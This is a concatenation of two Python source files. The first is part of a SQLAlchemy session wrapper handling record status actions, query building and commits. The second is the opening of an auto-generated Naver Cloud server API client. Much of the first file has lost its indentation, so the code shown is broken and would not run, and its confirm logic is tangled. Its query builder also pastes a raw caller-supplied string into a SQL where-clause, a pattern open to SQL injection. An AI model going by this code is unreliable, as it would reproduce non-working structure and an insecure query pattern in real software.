api_result = {'api_status': 'success', 'api_message': msg, 'api_data': record_dict, 'rows_added':0,'rows_updated':0, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID,api_result,**_process_call_area)
return api_result
(ok,messages) = current_record_obj.update_validation(valid_fields_dictionary)
if not ok:
msg=f'{_method_entity.upper()} update validation errors'
api_result = {'api_status': 'error', 'api_message': msg, 'api_data': record_dict, 'messages':messages, 'rows_updated':0, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID,api_result,**_process_call_area)
return api_result
self.session.add(current_record_obj)
if auto_commit:
self.commit(**_process_call_area)
record_dict = current_record_obj.to_dict()
msg = f'OK. {_method_entity.upper()} refreshed'
api_result = {'api_status': 'success', 'api_message': msg, 'api_data': record_dict, 'rows_added':0,'rows_updated':1, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID,api_result,**_process_call_area)
return api_result
        elif action.upper() == 'DELETE':
            if str(current_record_obj.status).upper() == 'DELETED':
msg = f'OK. {_method_entity.upper()} already Deleted (status:{current_record_obj.status})'
api_result = {'api_status': 'success', 'api_message': msg, 'api_data': record_dict, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID,api_result,**_process_call_area)
return api_result
current_record_obj.status='Deleted'
if auto_commit:
self.commit(**_process_call_area)
record_dict = current_record_obj.to_dict()
msg = f'OK. {_method_entity.upper()} deleted'
api_result = {'api_status': 'success', 'api_message': msg, 'api_data': record_dict, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID,api_result,**_process_call_area)
return api_result
        elif action.upper() == 'REMOVE':
            if str(current_record_obj.status).upper() != 'DELETED':
msg = f'{_method_entity.upper()} must be DELETED before REMOVED (status:{current_record_obj.status})'
api_result = {'api_status': 'error', 'api_message': msg, 'api_data': record_dict, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID,api_result,**_process_call_area)
return api_result
self.session.delete(current_record_obj)
if auto_commit:
self.commit(**_process_call_area)
msg = f'OK. {_method_entity.upper()} removed'
api_result = {'api_status': 'success', 'api_message': msg, 'api_data': record_dict, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID,api_result,**_process_call_area)
return api_result
        elif action.upper() == 'ACTIVATE':
            if str(current_record_obj.status).upper() == 'ACTIVE':
msg = f'OK. {_method_entity.upper()} already Active (status:{current_record_obj.status})'
api_result = {'api_status': 'success', 'api_message': msg, 'api_data': record_dict, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID,api_result,**_process_call_area)
return api_result
current_record_obj.status='Active'
if auto_commit:
self.commit(**_process_call_area)
record_dict = current_record_obj.to_dict()
msg = f'OK. {_method_entity.upper()} activated'
api_result = {'api_status': 'success', 'api_message': msg, 'api_data': record_dict, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID,api_result,**_process_call_area)
return api_result
        elif action.upper() == 'DEACTIVATE':
            if str(current_record_obj.status).upper() != 'ACTIVE':
msg = f'OK. {_method_entity.upper()} already inActive (status:{current_record_obj.status})'
api_result = {'api_status': 'success', 'api_message': msg, 'api_data': record_dict, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID,api_result,**_process_call_area)
return api_result
current_record_obj.status='InActive'
if auto_commit:
self.commit(**_process_call_area)
record_dict = current_record_obj.to_dict()
msg = f'OK. {_method_entity.upper()} deactivated'
api_result = {'api_status': 'success', 'api_message': msg, 'api_data': record_dict, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID,api_result,**_process_call_area)
return api_result
        elif action.upper() == 'UNREGISTER':
            if str(current_record_obj.status).upper() != 'ACTIVE':
msg = f'OK. {_method_entity.upper()} already inActive (status:{current_record_obj.status})'
api_result = {'api_status': 'success', 'api_message': msg, 'api_data': record_dict, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID,api_result,**_process_call_area)
return api_result
current_record_obj.status='UnRegistered'
if auto_commit:
self.commit(**_process_call_area)
record_dict = current_record_obj.to_dict()
msg = f'OK. {_method_entity.upper()} UnRegistered'
api_result = {'api_status': 'success', 'api_message': msg, 'api_data': record_dict, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID,api_result,**_process_call_area)
return api_result
        elif action.upper() == 'CONFIRM':
            try:
                confirmed = current_record_obj.confirmed
                confirmed_in_record = True
            except AttributeError:
                confirmed = 0
                confirmed_in_record = False
if confirmed_in_record:
if confirmed:
                    if str(current_record_obj.status).upper() == 'ACTIVE':
msg = f'OK. {_method_entity.upper()} already Confirmed (status:{current_record_obj.status})'
api_result = {'api_status': 'success', 'api_message': msg, 'api_data': record_dict, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID, api_result, **_process_call_area)
return api_result
else:
msg = f'OK. {_method_entity.upper()} Confirmed but status not active. (status:{current_record_obj.status})'
api_result = {'api_status': 'success', 'api_message': msg, 'api_data': record_dict, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_message(_method_msgID, 'warning', msg, **_process_call_area)
else:
                    if str(current_record_obj.status).upper() == 'ACTIVE':
msg = f'OK. {_method_entity.upper()} already Confirmed (status:{current_record_obj.status})'
api_result = {'api_status': 'success', 'api_message': msg, 'api_data': record_dict, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID, api_result, **_process_call_area)
return api_result
            if not confirmed:
                current_record_obj.status = 'Confirmed'
                try:
                    current_record_obj.confirmed_timestamp = now
                except Exception:
                    pass
                try:
                    current_record_obj.confirmed = 1
                except Exception:
                    pass
if auto_commit:
self.commit(**_process_call_area)
record_dict = current_record_obj.to_dict()
msg = f'OK. {_method_entity.upper()} Confirmed'
api_result = {'api_status': 'success', 'api_message': msg, 'api_data': record_dict, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID, api_result, **_process_call_area)
current_record_obj.status='Active'
if auto_commit:
self.commit(**_process_call_area)
record_dict = current_record_obj.to_dict()
msg = f'OK. {_method_entity.upper()} confirmed and activated'
api_result = {'api_status': 'success', 'api_message': msg, 'api_data': record_dict, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID,api_result,**_process_call_area)
return api_result
        else:  # INQUIRY / GET fall-through
msg = f'OK. {_method_entity.upper()} retrieved'
api_result = {'api_status': 'success', 'api_message': msg, 'api_data': record_dict, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID,api_result,**_process_call_area)
return api_result
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
    def build_query(self, table_model, kwargs):
        # dict filter: AND of column equalities; string filter: raw where-clause
        if isinstance(kwargs, dict):
            query = self.session.query(table_model)
            for key in kwargs.keys():
                if key in table_model.__table__.columns.keys():
                    val = kwargs.get(key)
                    query = query.filter(getattr(table_model.__table__.columns, key) == val)
        elif isinstance(kwargs, str):
            select_sql = f"select * from {table_model.__tablename__} where {kwargs}"
            # return the Query itself (not .all()) so callers can use
            # .count()/.first()/.all() uniformly, as they do for dict filters
            query = self.session.query(table_model).from_statement(text(select_sql))
        else:
            return None
        return query
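    # Usage sketch (hypothetical `User`/`db`): the filter argument is either a
    # dict of column equalities (ANDed together) or a raw SQL where-clause:
    #
    #     q1 = db.build_query(User, {'status': 'Active'})
    #     q2 = db.build_query(User, "status = 'Active'")
    #     rows = q1.all() if q1 is not None else []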
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
    def smart_locate_expression(self, table_model, locate_dict):
        # pick the most selective filter available: a complete primary key,
        # else a unique-key value, else whatever plain columns were supplied;
        # a primary-key column that is missing or None marks the key partial
        from_primary_key = {}
        from_unique_key = {}
        from_other_fields = {}
        partial_pk = False
        for column in table_model.__table__.columns:
            val = locate_dict.get(column.key)
            if column.unique and val is not None:
                from_unique_key = {column.key: val}
            if column.primary_key:
                if val is not None:
                    from_primary_key.update({column.key: val})
                else:
                    partial_pk = True
            if not column.unique and val is not None:
                from_other_fields.update({column.key: val})
        if from_primary_key and not partial_pk:
            return from_primary_key
        elif from_unique_key:
            return from_unique_key
        elif from_other_fields:
            return from_other_fields
        return {}
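    # Illustration (hypothetical model with primary key `id` and unique
    # `email`): the most selective filter wins.
    #
    #     smart_locate_expression(User, {'id': 7, 'email': 'a@b.c', 'name': 'Ada'})
    #     # -> {'id': 7}
    #     smart_locate_expression(User, {'email': 'a@b.c', 'name': 'Ada'})
    #     # -> {'email': 'a@b.c'}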
########################################################################################
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
    def smart_locate_expression2(self, table_model, locate_dict):
        # insert-time variant: always builds the full primary-key filter,
        # using None for primary-key values that were not supplied
        from_primary_key = {}
        from_unique_key = {}
        from_other_fields = {}
        for column in table_model.__table__.columns:
            val = locate_dict.get(column.key)
            if column.unique and val is not None:
                from_unique_key = {column.key: val}
            if column.primary_key:
                from_primary_key.update({column.key: val})
            if not column.unique and val is not None:
                from_other_fields.update({column.key: val})
        if from_primary_key:
            return from_primary_key
        elif from_unique_key:
            return from_unique_key
        elif from_other_fields:
            return from_other_fields
        return {}
########################################################################################
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
def get_table_row_as_dict(self, table_model, get_specification, caller_area={}, **kwargs):
rowObj = self.get_table_row(table_model, get_specification, caller_area=caller_area, **kwargs)
if not rowObj:
return {}
current_record_dict = table_model.to_dict(rowObj)
return current_record_dict
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
def get_table_rows_as_dict(self, table_model, get_specification, caller_area={}, **kwargs):
rowObjs = self.get_table_rows(table_model, get_specification, caller_area=caller_area, **kwargs)
if not rowObjs:
return []
rows_array = self.rows_to_dict(table_model, rowObjs)
return rows_array
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
def rows_to_dict(self, table_model, rowObjs, caller_area={}, **kwargs):
if not rowObjs:
return []
rows_array=[]
for rowObj in rowObjs:
current_record_dict = table_model.to_dict(rowObj)
rows_array.append(current_record_dict)
return rows_array
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
def update_from_dict(self, model_record, **kwargs):
"""Update this model with a dictionary."""
changes = {}
readonly_columns = []
autoset_columns=[]
if hasattr(model_record, "_readonly_fields"):
readonly_columns += model_record._readonly_fields
if hasattr(model_record, "_hidden_fields"):
readonly_columns += model_record._hidden_fields
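        # column.info flags drive auto-managed fields: 'is_readOnly' blocks
        # caller updates, 'is_rowUID' fills an empty UUID column,
        # 'is_autoSetTimestamp' stamps the row, and 'is_autoIncrementCounter'
        # bumps a numeric counter; auto-set columns are then excluded from the
        # caller-supplied kwargs pass below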
for c in model_record.__table__.columns:
if c.key not in readonly_columns:
if c.info:
                    if isinstance(c.info, dict):
if c.info.get('is_readOnly'):
readonly_columns.append(c.key)
elif c.info.get('is_rowUID'):
val_old = getattr(model_record, c.key)
                            if val_old is None:
val_new = get_uuid(model_record.__table__,c.key)
setattr(model_record, c.key, val_new)
autoset_columns.append(c.key)
changes[c.key] = {"old_value": val_old, "new_value": val_new}
elif c.info.get('is_autoSetTimestamp'):
val_old = getattr(model_record, c.key)
if str(val_old).isnumeric():
val_new = datetime.datetime.utcnow()
setattr(model_record, c.key, val_new)
autoset_columns.append(c.key)
changes[c.key] = {"old_value": val_old, "new_value": val_new}
elif c.info.get('is_autoIncrementCounter'):
val_old = getattr(model_record, c.key)
if str(val_old).isnumeric():
val_new = int(val_old) + 1
setattr(model_record, c.key, val_new)
autoset_columns.append(c.key)
changes[c.key] = {"old_value": val_old, "new_value": val_new}
for key in kwargs:
if key in model_record.__table__.columns.keys():
if not key.startswith("_"):
if key not in readonly_columns and key not in autoset_columns:
val_old = getattr(model_record, key)
val_new = kwargs[key]
if str(val_old) != str(val_new):
changes[key] = {"old_value": val_old, "new_value": val_new}
setattr(model_record, key, val_new)
return changes
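    # Usage sketch (hypothetical `user` object): returns a per-column change
    # map, which callers log via log_process_data:
    #
    #     changes = db.update_from_dict(user, name='Ada Lovelace')
    #     # -> {'name': {'old_value': 'Ada', 'new_value': 'Ada Lovelace'}}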
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def commit(self, **kwargs):
session_debug_level = get_debug_option_as_level(self.debug)
process_id = kwargs.get('msgID', '')
caller_debug_level = get_debug_option_as_level(kwargs.get('debug_level'))
kwargs.update({'debug_level':max(session_debug_level,caller_debug_level)})
if not kwargs.get('indent_method'):
kwargs.update({'indent_method':'CALL_LEVEL'})
msg=f"[session] [[{self.session_id}]] [COMMIT]"
if process_id:
msg=msg+'#C0# in #C0#'+process_id
self.session.commit()
log_process_result_message('','session',msg,**kwargs)
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def rollback(self, **kwargs):
session_debug_level = get_debug_option_as_level(self.debug)
process_id = kwargs.get('msgID', '')
caller_debug_level = get_debug_option_as_level(kwargs.get('debug_level'))
kwargs.update({'debug_level':max(session_debug_level,caller_debug_level)})
if not kwargs.get('indent_method'):
kwargs.update({'indent_method':'CALL_LEVEL'})
msg=f"[session] [[{self.session_id}]] [ROLLBACK]"
if process_id:
msg=msg+'#C0# in #C0#'+process_id
self.session.rollback()
log_process_result_message('','session',msg,**kwargs)
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def close(self, **kwargs):
session_debug_level = get_debug_option_as_level(self.debug)
process_id = kwargs.get('msgID', '')
caller_debug_level = get_debug_option_as_level(kwargs.get('debug_level'))
kwargs.update({'debug_level': max(session_debug_level, caller_debug_level)})
if not kwargs.get('indent_method'):
kwargs.update({'indent_method':'CALL_LEVEL'})
msg=f"[session] [[{self.session_id}]] [CLOSE]"
if process_id:
msg=msg+'#C0# in #C0#'+process_id
self.session.close()
log_process_result_message('','session',msg,**kwargs)
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def flush(self, **kwargs):
session_debug_level = get_debug_option_as_level(self.debug)
process_id = kwargs.get('msgID', '')
caller_debug_level = get_debug_option_as_level(kwargs.get('debug_level'))
kwargs.update({'debug_level':max(session_debug_level,caller_debug_level)})
if not kwargs.get('indent_method'):
kwargs.update({'indent_method':'CALL_LEVEL'})
msg=f"[session] [[{self.session_id}]] [FLUSH]"
if process_id:
msg=msg+'#C0# in #C0#'+process_id
self.session.flush()
log_process_result_message('','session',msg,**kwargs)
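    # Note: the session wrappers above merge verbosity as
    # max(session debug level, caller debug level), so a commit requested
    # quietly by a caller still logs when the session itself is verbose:
    #
    #     db.commit(msgID='table [USERS] insert', debug_level=0)  # hypothetical call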
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def set_msgID(api_name, api_action, api_table):
msgid=f"table [{api_table.upper()}] #MAGENTA#{api_name}#C0#"
return msgid
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def get_uuid(what='?', col='?'):
    # time-based UUID with a random, non-MAC node id; note that
    # uuid._random_getnode is a CPython-private helper
    return str(uuid.uuid1(uuid._random_getnode()))
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
# module initialization
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
module_ProgramName = os.path.splitext(os.path.basename(__file__))[0]
module_id = module_ProgramName
module_version = 0.1
module_identityDictionary = {
'module_ProgramName':module_ProgramName,
'module_id':module_id,
'module_version':module_version,
'module_is_externally_configurable':False,
}
module_configuration = {}
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
module_configuration = retrieve_module_configuration(__file__, module_identityDictionary, module_configuration, print_enabled=thisApp.DEBUG_ON, filelog_enabled=thisApp.FILELOG_ON, handle_as_init=False)
(print_enabled, filelog_enabled, log_file, errors_file,consolelog_enabled)=get_globals_from_configuration(module_configuration)
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
module_configuration = add_methods_to_configuration('database_actions', module_configuration, leandroutechnologyforward_database_session_class, ['ALL'], ['_init_'])
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
# methods == collect_method_names_from_class(leandroutechnologyforward_database_session_class, methods_ids=['ALL'])
# print(methods)
# exit(0)
# module_configuration = add_apis_to_configuration('database_actions', module_configuration, thisModuleObj, functions_ids, exclude_functions_ids)
#save_module_configuration(module_identityDictionary, module_configuration, print_enabled=consolelog_enabled, filelog_enabled=filelog_enabled)
thisApp.pair_module_configuration('database_actions',module_configuration)
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
if get_module_debug_level(module_id) > 0:
    actions = thisApp.application_configuration.get('database_actions', {})
    for action_name in actions.keys():
        action_entry = actions.get(action_name)
        msg = f'module [[{module_id}]] database action [{action_name}] [[[{action_entry}]]]'
        if thisApp.get_module_debug_level(module_id):
            log_message(msg)
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
# main
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
if __name__ == '__main__':
#tests/research
print(__file__)
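    # Minimal smoke-test sketch (hedged): the model module and connection
    # details are not defined here, so this stays commented out.
    #
    #     # from models import User
    #     # db = leandroutechnologyforward_database_session_class(...)
    #     # print(db.get_table_rows_as_dict(User, {'status': 'Active'}, caller_area={}))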
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
# [dataset record boundary - per-file quality statistics omitted]
# next file: lib/services/vserver/ncloud_vserver/api/v2_api.py
# repo: NaverCloudPlatform/ncloud-sdk-python @ 5976dfabd205c615fcf57ac2f0ab67313ee6953c
# hexsha: 72d85077ba8907f2d03a9ee04954bbb531e33b63 | license: MIT | lang: Python | size: 295,042 bytes
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
# coding: utf-8
"""
vserver
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from ncloud_vserver.api_client import ApiClient
class V2Api(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def add_access_control_group_inbound_rule(self, add_access_control_group_inbound_rule_request, **kwargs): # noqa: E501
"""add_access_control_group_inbound_rule # noqa: E501
        Add an ACG inbound rule  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.add_access_control_group_inbound_rule(add_access_control_group_inbound_rule_request, async=True)
>>> result = thread.get()
:param async bool
:param AddAccessControlGroupInboundRuleRequest add_access_control_group_inbound_rule_request: addAccessControlGroupInboundRuleRequest (required)
:return: AddAccessControlGroupInboundRuleResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.add_access_control_group_inbound_rule_with_http_info(add_access_control_group_inbound_rule_request, **kwargs) # noqa: E501
else:
(data) = self.add_access_control_group_inbound_rule_with_http_info(add_access_control_group_inbound_rule_request, **kwargs) # noqa: E501
return data
def add_access_control_group_inbound_rule_with_http_info(self, add_access_control_group_inbound_rule_request, **kwargs): # noqa: E501
"""add_access_control_group_inbound_rule # noqa: E501
        Add an ACG inbound rule  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.add_access_control_group_inbound_rule_with_http_info(add_access_control_group_inbound_rule_request, async=True)
>>> result = thread.get()
:param async bool
:param AddAccessControlGroupInboundRuleRequest add_access_control_group_inbound_rule_request: addAccessControlGroupInboundRuleRequest (required)
:return: AddAccessControlGroupInboundRuleResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['add_access_control_group_inbound_rule_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_access_control_group_inbound_rule" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'add_access_control_group_inbound_rule_request' is set
if ('add_access_control_group_inbound_rule_request' not in params or
params['add_access_control_group_inbound_rule_request'] is None):
raise ValueError("Missing the required parameter `add_access_control_group_inbound_rule_request` when calling `add_access_control_group_inbound_rule`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'add_access_control_group_inbound_rule_request' in params:
body_params = params['add_access_control_group_inbound_rule_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/addAccessControlGroupInboundRule', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AddAccessControlGroupInboundRuleResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def add_access_control_group_outbound_rule(self, add_access_control_group_outbound_rule_request, **kwargs): # noqa: E501
"""add_access_control_group_outbound_rule # noqa: E501
        Add an ACG outbound rule  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.add_access_control_group_outbound_rule(add_access_control_group_outbound_rule_request, async=True)
>>> result = thread.get()
:param async bool
:param AddAccessControlGroupOutboundRuleRequest add_access_control_group_outbound_rule_request: addAccessControlGroupOutboundRuleRequest (required)
:return: AddAccessControlGroupOutboundRuleResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.add_access_control_group_outbound_rule_with_http_info(add_access_control_group_outbound_rule_request, **kwargs) # noqa: E501
else:
(data) = self.add_access_control_group_outbound_rule_with_http_info(add_access_control_group_outbound_rule_request, **kwargs) # noqa: E501
return data
def add_access_control_group_outbound_rule_with_http_info(self, add_access_control_group_outbound_rule_request, **kwargs): # noqa: E501
"""add_access_control_group_outbound_rule # noqa: E501
        Add an ACG outbound rule  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.add_access_control_group_outbound_rule_with_http_info(add_access_control_group_outbound_rule_request, async=True)
>>> result = thread.get()
:param async bool
:param AddAccessControlGroupOutboundRuleRequest add_access_control_group_outbound_rule_request: addAccessControlGroupOutboundRuleRequest (required)
:return: AddAccessControlGroupOutboundRuleResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['add_access_control_group_outbound_rule_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_access_control_group_outbound_rule" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'add_access_control_group_outbound_rule_request' is set
if ('add_access_control_group_outbound_rule_request' not in params or
params['add_access_control_group_outbound_rule_request'] is None):
raise ValueError("Missing the required parameter `add_access_control_group_outbound_rule_request` when calling `add_access_control_group_outbound_rule`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'add_access_control_group_outbound_rule_request' in params:
body_params = params['add_access_control_group_outbound_rule_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/addAccessControlGroupOutboundRule', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AddAccessControlGroupOutboundRuleResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def add_network_interface_access_control_group(self, add_network_interface_access_control_group_request, **kwargs): # noqa: E501
"""add_network_interface_access_control_group # noqa: E501
        Add an ACG to a network interface  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.add_network_interface_access_control_group(add_network_interface_access_control_group_request, async=True)
>>> result = thread.get()
:param async bool
:param AddNetworkInterfaceAccessControlGroupRequest add_network_interface_access_control_group_request: addNetworkInterfaceAccessControlGroupRequest (required)
:return: AddNetworkInterfaceAccessControlGroupResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.add_network_interface_access_control_group_with_http_info(add_network_interface_access_control_group_request, **kwargs) # noqa: E501
else:
(data) = self.add_network_interface_access_control_group_with_http_info(add_network_interface_access_control_group_request, **kwargs) # noqa: E501
return data
def add_network_interface_access_control_group_with_http_info(self, add_network_interface_access_control_group_request, **kwargs): # noqa: E501
"""add_network_interface_access_control_group # noqa: E501
        Add an ACG to a network interface  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.add_network_interface_access_control_group_with_http_info(add_network_interface_access_control_group_request, async=True)
>>> result = thread.get()
:param async bool
:param AddNetworkInterfaceAccessControlGroupRequest add_network_interface_access_control_group_request: addNetworkInterfaceAccessControlGroupRequest (required)
:return: AddNetworkInterfaceAccessControlGroupResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['add_network_interface_access_control_group_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_network_interface_access_control_group" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'add_network_interface_access_control_group_request' is set
if ('add_network_interface_access_control_group_request' not in params or
params['add_network_interface_access_control_group_request'] is None):
